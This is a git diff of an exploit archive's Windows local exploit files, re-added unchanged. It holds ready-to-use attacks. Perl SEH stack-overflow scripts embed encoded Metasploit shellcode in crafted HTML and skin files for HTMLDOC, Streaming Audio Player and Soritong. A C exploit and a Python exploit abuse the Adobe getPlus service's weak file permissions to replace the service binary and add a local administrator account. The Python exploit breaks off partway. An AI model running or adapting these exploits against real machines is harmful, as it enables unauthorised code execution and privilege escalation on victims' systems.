-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
-"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
-"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
-"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
-"\x4e\x46\x43\x36\x42\x50\x5a";
-$payload = "\n";
-open(vuln,'>>exploit.html');
-print vuln $payload;
-print "[+] Done !! [+]";
-close(vuln);
-
-# milw0rm.com [2009-07-17]
+#!/usr/bin/perl
+# htmldoc 1.8.27.1 (.html) Universal Stack Overflow Exploit
+# http://en.securitylab.ru/poc/extra/382563.php >> Bufferoverflow POC
+# By ksa04
+# j-7[at]hotmail[dot]com
+# From Kingdom of Saudi Arabia
+#[+]--------------------------------------------------------------------------------------[+]#
+# program : HTMLDOC
+# version : all versions (tested 1.8.27.1 and 1.8.27 and 1.8.24)
+# website program : http://www.htmldoc.org 
+# Download : http://www.easysw.com/htmldoc/software.php
+# Tested Under Windows XP SP3
+# NOTE : launching from directory >> htmldoc -f lol.pdf exploit.html
+# or launching HTMLDOC.exe >> add file >> Document type (wEb page or continuous) >>
+# put any thing in Output >> Generate 
+#[+]--------------------------------------------------------------------------------------[+]#
+# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
+my $shellcode = 
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
+"\x4e\x46\x43\x36\x42\x50\x5a";
+$payload = "\n";
+open(vuln,'>>exploit.html');
+print vuln $payload;
+print "[+] Done !! [+]";
+close(vuln);
+
+# milw0rm.com [2009-07-17]
diff --git a/platforms/windows/local/9199.txt b/platforms/windows/local/9199.txt
index a599a0f2c..930bd6440 100755
--- a/platforms/windows/local/9199.txt
+++ b/platforms/windows/local/9199.txt
@@ -1,36 +1,36 @@
-Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges
-by Nine:Situations:Group
-site: http://retrogod.altervista.org/
-
-description:
-Adobe downloader used to download updates for Adobe applications.
-Shipped with Acrobat Reader 9.x
-
-vendor: Nos Microsystems
-
-poc:
-
-C:\>sc qc "getPlus(R) Helper"
-[SC] GetServiceConfig SUCCESS
-
-SERVICE_NAME: getPlus(R) Helper
-        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
-        START_TYPE         : 3   DEMAND_START
-        ERROR_CONTROL      : 1   NORMAL
-        BINARY_PATH_NAME   : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe
-        LOAD_ORDER_GROUP   :
-        TAG                : 0
-        DISPLAY_NAME       : getPlus(R) Helper
-        DEPENDENCIES       : RPCSS
-        SERVICE_START_NAME : LocalSystem
-
-C:\>cacls "C:\Programmi\NOS\bin\getPlus_HelperSvc.exe"
-C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F <-------------- [!!!]
-                                           NT AUTHORITY\SYSTEM:F
-
-The executable file is installed with improper permissions, with "full
-control" for Builtin Users; a simple user can replace it with a binary of
-choice.
-At the next reboot it will run with SYSTEM privileges.
-
-# milw0rm.com [2009-07-20]
+Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges
+by Nine:Situations:Group
+site: http://retrogod.altervista.org/
+
+description:
+Adobe downloader used to download updates for Adobe applications.
+Shipped with Acrobat Reader 9.x
+
+vendor: Nos Microsystems
+
+poc:
+
+C:\>sc qc "getPlus(R) Helper"
+[SC] GetServiceConfig SUCCESS
+
+SERVICE_NAME: getPlus(R) Helper
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 3   DEMAND_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : getPlus(R) Helper
+        DEPENDENCIES       : RPCSS
+        SERVICE_START_NAME : LocalSystem
+
+C:\>cacls "C:\Programmi\NOS\bin\getPlus_HelperSvc.exe"
+C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F <-------------- [!!!]
+                                           NT AUTHORITY\SYSTEM:F
+
+The executable file is installed with improper permissions, with "full
+control" for Builtin Users; a simple user can replace it with a binary of
+choice.
+At the next reboot it will run with SYSTEM privileges.
+
+# milw0rm.com [2009-07-20]
diff --git a/platforms/windows/local/920.c b/platforms/windows/local/920.c
index 77886e36c..db31db513 100755
--- a/platforms/windows/local/920.c
+++ b/platforms/windows/local/920.c
@@ -55,6 +55,6 @@ int main(void)
         }
 
        return 0;
-}
-
-// milw0rm.com [2005-04-07]
+}
+
+// milw0rm.com [2005-04-07]
diff --git a/platforms/windows/local/9215.pl b/platforms/windows/local/9215.pl
index 7d4d34095..20b40548c 100755
--- a/platforms/windows/local/9215.pl
+++ b/platforms/windows/local/9215.pl
@@ -1,49 +1,49 @@
-# *+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*
-# }{ SkuLL-HacKeR }{
-# *+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*
-
-#!/usr/bin/perl
-#[+] Streaming Audio Player 0.9 (skin) Local Stack Overflow (SEH)
-# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37".
-"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48".
-"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48".
-"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43".
-"\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a".
-"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b".
-"\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49".
-"\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46".
-"\x4e\x36\x43\x46\x42\x50\x5a";
-my $junk  = "\x41" x 236;
-my $nseh   = "\xEB\x06\x90\x90";
-my $seh   = "\xB8\x15\xD1\x72";
-my $junk2   = "\x90" x 2000;
-open(myfile,'>>UI.TXT');
-print myfile $junk.$nseh.$seh.$shellcode.$junk2;
-
-# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
- 
-                               # Author : SkuLL-HacKeR
-                          # Home : www.Skull-hackeR.NeT
-                   # GreetZ : PrOF.SELLiM , ThE X-HaCkEr , Amine-vb  # : Str0ke
-                   #  Contact : SkuLL--HacKeR@HotmaiL.CoM
- 
-# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
-#  END..
-# ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° *
-
-# milw0rm.com [2009-07-20]
+# *+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*
+# }{ SkuLL-HacKeR }{
+# *+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*
+
+#!/usr/bin/perl
+#[+] Streaming Audio Player 0.9 (skin) Local Stack Overflow (SEH)
+# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37".
+"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48".
+"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48".
+"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43".
+"\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a".
+"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b".
+"\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49".
+"\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46".
+"\x4e\x36\x43\x46\x42\x50\x5a";
+my $junk  = "\x41" x 236;
+my $nseh   = "\xEB\x06\x90\x90";
+my $seh   = "\xB8\x15\xD1\x72";
+my $junk2   = "\x90" x 2000;
+open(myfile,'>>UI.TXT');
+print myfile $junk.$nseh.$seh.$shellcode.$junk2;
+
+# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
+ 
+                               # Author : SkuLL-HacKeR
+                          # Home : www.Skull-hackeR.NeT
+                   # GreetZ : PrOF.SELLiM , ThE X-HaCkEr , Amine-vb  # : Str0ke
+                   #  Contact : SkuLL--HacKeR@HotmaiL.CoM
+ 
+# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
+#  END..
+# ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° *
+
+# milw0rm.com [2009-07-20]
diff --git a/platforms/windows/local/9216.pl b/platforms/windows/local/9216.pl
index cc9c79b79..283bc1085 100755
--- a/platforms/windows/local/9216.pl
+++ b/platforms/windows/local/9216.pl
@@ -1,72 +1,72 @@
-         ######################################################
-     #-------------------- ~~> SkuLL-HacKeR <~~  -----------------#                                     
-          ####################################################
-
-#!/usr/bin/perl
-#[+] Bug : Soritong MP3 Player 1.0 (SKIN) Local Stack Overflow Exploit (SEH)
-# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37".
-"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48".
-"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48".
-"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43".
-"\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a".
-"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b".
-"\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49".
-"\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46".
-"\x4e\x36\x43\x46\x42\x50\x5a";
-my $junk  = "\x41" x 584;
-my $nseh   = "\xEB\x06\x90\x90";
-my $seh   = "\xE8\x8D\x01\x10"; # universall adress
-my $junk2   = "\x90" x 1000;
-open(myfile,'>>UI.TXT');
-print myfile $junk.$nseh.$seh.$shellcode.$junk2;
- 
-print $payload;
- 
-##############################################
-
-# Author : SkuLL-HacKeR
-# Home : WwW.Sec-ArT.CoM/cc
-# GreetZ : ~~>  etc .............
-
-**
-***
-***
-***
-******
-*****
-****
-***
-**
-*
- 
- 
-                l 
-                l
-               V
-
-#   By SkuLL-HACkeR
- 
-               ^
-                l
-                l
-
-
-
-##############################################
-
-# milw0rm.com [2009-07-20]
+         ######################################################
+     #-------------------- ~~> SkuLL-HacKeR <~~  -----------------#                                     
+          ####################################################
+
+#!/usr/bin/perl
+#[+] Bug : Soritong MP3 Player 1.0 (SKIN) Local Stack Overflow Exploit (SEH)
+# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37".
+"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48".
+"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48".
+"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43".
+"\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a".
+"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b".
+"\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49".
+"\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46".
+"\x4e\x36\x43\x46\x42\x50\x5a";
+my $junk  = "\x41" x 584;
+my $nseh   = "\xEB\x06\x90\x90";
+my $seh   = "\xE8\x8D\x01\x10"; # universall adress
+my $junk2   = "\x90" x 1000;
+open(myfile,'>>UI.TXT');
+print myfile $junk.$nseh.$seh.$shellcode.$junk2;
+ 
+print $payload;
+ 
+##############################################
+
+# Author : SkuLL-HacKeR
+# Home : WwW.Sec-ArT.CoM/cc
+# GreetZ : ~~>  etc .............
+
+**
+***
+***
+***
+******
+*****
+****
+***
+**
+*
+ 
+ 
+                l 
+                l
+               V
+
+#   By SkuLL-HACkeR
+ 
+               ^
+                l
+                l
+
+
+
+##############################################
+
+# milw0rm.com [2009-07-20]
diff --git a/platforms/windows/local/9223.txt b/platforms/windows/local/9223.txt
index 089937ee6..35e79a739 100755
--- a/platforms/windows/local/9223.txt
+++ b/platforms/windows/local/9223.txt
@@ -1,72 +1,72 @@
-/*
-alwaysdirtyneverclean.c
-AKA
-Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (alwaysdirtyneverclean.zip)
-BY
-Jeremy Brown 2009 [0xjbrown41@gmail.com] 07.21.2009
-***********************************************************************************************************
-I've been up for nearly 24 hours (only the last few doing research though). This exploit is based on the
-brief information provided by Nine:Situations:Group (http://www.milw0rm.com/exploits/9199). Exploiting
-improper permissions is fun. A few notes are in order though. The getPlus service (that I tested, via 9.1.2)
-isn't installed as an "Automatic" service, therefore making it slightly harder (but not hard) to practically
-use to your advantage. But I tested running this code under a GUEST account and it worked pretty good (just
-the first time though). Change the values as needed, compile and run. Things could be more or less silent,
-lethal or non-lethal... it is completely up to you. Things cannot get much simpler than this :)
-
-Tested on Windows XP SP3 + Adobe Acrobat 9.1.2 (installed from adobe's download manager, then updated)
-
-But maybe give Adobe a break? 2009 has been a rough year for them already, heh. Sleep time.
-***********************************************************************************************************
-alwaysdirtyneverclean.c
-*/
-
-#include 
-#include 
-
-#define DEFAULT_TARGET  "C:\\Program Files\\NOS\\bin\\GetPlus_HelperSvc.exe"
-#define DEFAULT_BACKUP  "C:\\Program Files\\NOS\\bin\\GetPlus_HelperSvc.exe.bak"
-#define DEFAULT_EXECUTE "C:\\Documents and Settings\\All Users\\Documents\\bin.exe"
-//#define DEFAULT_EXECUTE "C:\\WINDOWS\\system32\\calc.exe"
-
-int main(int argc, char *argv[])
-{
-
-     MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP);
-     CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE);
-     // shakee and bakeee
-
-     return 0;
-
-}
-///////////////////////////////////// cut /////////////////////////////////////
-
-/*
-bin.c
-FROM
-Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (alwaysdirtyneverclean.zip)
-BY
-Jeremy Brown 2009 [0xjbrown41@gmail.com] 07.21.2009
-*/
-
-#include 
-#include 
-
-#define CMD "C:\\WINDOWS\\system32\\cmd.exe"
-#define ONE "/C net user adobe pwned /add"
-#define TWO "/C net localgroup administrators adobe /add"
-
-int main(int argc, char *argv[])
-{
-
-STARTUPINFO si = {sizeof(STARTUPINFO)};
-PROCESS_INFORMATION pi;
-
-     CreateProcess(CMD, ONE, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
-     CreateProcess(CMD, TWO, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
-     // mmmmmmmmmmm.. chocolate browie ice cream smoothes are goooood
-
-     return 0;
-
-}
-
-# milw0rm.com [2009-07-21]
+/*
+alwaysdirtyneverclean.c
+AKA
+Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (alwaysdirtyneverclean.zip)
+BY
+Jeremy Brown 2009 [0xjbrown41@gmail.com] 07.21.2009
+***********************************************************************************************************
+I've been up for nearly 24 hours (only the last few doing research though). This exploit is based on the
+brief information provided by Nine:Situations:Group (http://www.milw0rm.com/exploits/9199). Exploiting
+improper permissions is fun. A few notes are in order though. The getPlus service (that I tested, via 9.1.2)
+isn't installed as an "Automatic" service, therefore making it slightly harder (but not hard) to practically
+use to your advantage. But I tested running this code under a GUEST account and it worked pretty good (just
+the first time though). Change the values as needed, compile and run. Things could be more or less silent,
+lethal or non-lethal... it is completely up to you. Things cannot get much simpler than this :)
+
+Tested on Windows XP SP3 + Adobe Acrobat 9.1.2 (installed from adobe's download manager, then updated)
+
+But maybe give Adobe a break? 2009 has been a rough year for them already, heh. Sleep time.
+***********************************************************************************************************
+alwaysdirtyneverclean.c
+*/
+
+#include 
+#include 
+
+#define DEFAULT_TARGET  "C:\\Program Files\\NOS\\bin\\GetPlus_HelperSvc.exe"
+#define DEFAULT_BACKUP  "C:\\Program Files\\NOS\\bin\\GetPlus_HelperSvc.exe.bak"
+#define DEFAULT_EXECUTE "C:\\Documents and Settings\\All Users\\Documents\\bin.exe"
+//#define DEFAULT_EXECUTE "C:\\WINDOWS\\system32\\calc.exe"
+
+int main(int argc, char *argv[])
+{
+
+     MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP);
+     CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE);
+     // shakee and bakeee
+
+     return 0;
+
+}
+///////////////////////////////////// cut /////////////////////////////////////
+
+/*
+bin.c
+FROM
+Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (alwaysdirtyneverclean.zip)
+BY
+Jeremy Brown 2009 [0xjbrown41@gmail.com] 07.21.2009
+*/
+
+#include 
+#include 
+
+#define CMD "C:\\WINDOWS\\system32\\cmd.exe"
+#define ONE "/C net user adobe pwned /add"
+#define TWO "/C net localgroup administrators adobe /add"
+
+int main(int argc, char *argv[])
+{
+
+STARTUPINFO si = {sizeof(STARTUPINFO)};
+PROCESS_INFORMATION pi;
+
+     CreateProcess(CMD, ONE, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
+     CreateProcess(CMD, TWO, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
+     // mmmmmmmmmmm.. chocolate browie ice cream smoothes are goooood
+
+     return 0;
+
+}
+
+# milw0rm.com [2009-07-21]
diff --git a/platforms/windows/local/9272.py b/platforms/windows/local/9272.py
index f51253bac..c72a64ee3 100755
--- a/platforms/windows/local/9272.py
+++ b/platforms/windows/local/9272.py
@@ -1,49 +1,49 @@
-#!/usr/bin/env python
-##################################################################################
-#
-# Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit
-# Coded By: Dr_IDE
-# Discovered by: Nine:Situations:Group
-# Tested On: Windows XP SP2, Requires NOS Package Installed
-# Usage: python Dr_IDE-Adobe_912.py
-#
-##################################################################################
-
-import os, subprocess
-
-#
-# Should probably have a try block around this as not every install
-# of 9.1.2 has the NOS package on it. This is a little touchy so you may have to
-# play around with it.
-#
-# This is a super lame way to do this but it makes it more educational.
-evil =  "echo *************************************************************\n"
-evil += "echo *\n"
-evil += "echo * Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit\n"
-evil += "echo * Coded By: Dr_IDE\n"
-evil += "echo * Discovered By: Nine:Situations:Group\n"
-evil += "echo * Tested On: Windows XP SP2\n"
-evil += "echo *\n"
-evil += "echo *************************************************************\n"
-evil += "echo This will add user Dr_IDE:password to the Admin Group\n"
-evil += "cd C:\\Program Files\\NOS\\bin\n"
